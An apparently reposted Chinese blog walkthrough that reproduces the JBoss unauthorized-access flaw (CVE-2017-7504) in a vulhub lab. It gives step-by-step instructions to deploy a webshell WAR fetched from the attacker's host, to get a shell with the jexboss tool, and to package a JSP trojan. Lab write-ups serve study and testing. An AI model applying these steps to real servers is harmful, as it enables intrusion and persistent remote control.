JBOSS未授權訪問漏洞復現


1.JBOSS是什么

JBOSS是一個基於J2EE的開放源代碼的應用服務器。 JBoss代碼遵循LGPL許可,可以在任何商業應用中免費使用。JBoss是一個管理EJB的容器和服務器,支持EJB 1.1、EJB 2.0和EJB3的規范。但JBoss核心服務不包括支持servlet/JSP的WEB容器,一般與Tomcat或Jetty綁定使用。

2.JBOSS未授權訪問是什么

未授權訪問管理控制台,通過該漏洞,可以后台管理服務,可以通過腳本命令執行系統命令,如反彈shell,wget寫webshell文件。

3.漏洞環境搭建

漏洞環境:vulhub上的CVE-2017-7504
進入到CVE-2017-7504目錄執行docker-compose up -d

4.漏洞復現

說白了,這個未授權就是不需要用戶名和密碼就進入控制台,然后利用應用部署來部署war包,war包里有個jsp的馬,然后真香!!!

靶機的ip為192.168.66.134.
訪問192.168.66.134:8080,進入jboss。

進入控制台

看到如下界面,點擊紅色框選的:

網上的一些帖子說的是無用戶名和密碼登錄的,也就是說不需要密碼。但是我這里用vulhub搭建的居然需要用戶名和密碼,額,我人品的問題???隨便試了試,用戶名、密碼都是admin,進入控制台。

進入應用部署頁面

又點這個唄,進入應用部署界面。進入之后找到下面的部分:

上馬

ParamValue部分填寫遠程服務器上的木馬的地址。
這里用kali的apache2來弄,畢竟簡單。
進入kali,輸入service apache2 start啟動apache2.(可以輸入service apache2 status來看看是否開啟,下圖就是開啟狀態了)

然后便是將war包放在/var/www/html目錄,至於為啥放這里,請自行百度一哈。
我這里用的是冰蠍的bingxie.war。

然后就是在ParamValue處填寫地址了,我這里就填寫http://192.168.66.129/bingxie.war
注:192.168.66.129是kali的ip地址
然后就點Invoke。回顯一下頁面,就知道可以了。

去看看到底弄好沒,輸入http://192.168.66.134:8080/bingxie/
后面的bingxie就是前面部署的war包的名字

看到了shell.jsp,可以拿出冰蠍了。

5.jexboss工具

安裝方法:

git clone https://github.com/joaomatosf/jexboss
cd jexboss
python3 jexboss.py

出現以下界面便是能夠正常使用。

也可以輸入python3 jexboss.py -h查看具體參數。
這里我是輸入:python3 jexboss.py -u 192.168.66.134:8080
執行命令后出現下面的界面就說明可以搞事情:

等執行完后會彈出個選擇yes or no,當然選yes。yes就是創建連接。
一輸入yes,我本機的火絨就搞事情了。。。

真就管的寬,不過我喜歡!!!
回到正題,輸入yes后,就會有個shell的命令行,舒服啊!

6.war的制作

首先你得有Java環境,然后進入jdk目錄下的bin目錄(例如C:\Program Files\Java\jdk1.8.0_101\bin),進入命令行。
輸入jar cvf shell.war shell.jsp
注:shell.war是你要做出了的war文件,shell.jsp是提前准備的jsp木馬文件

誒,弄完了。。。溜了溜了,防御啥的隨便找點文章看看,多的很。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM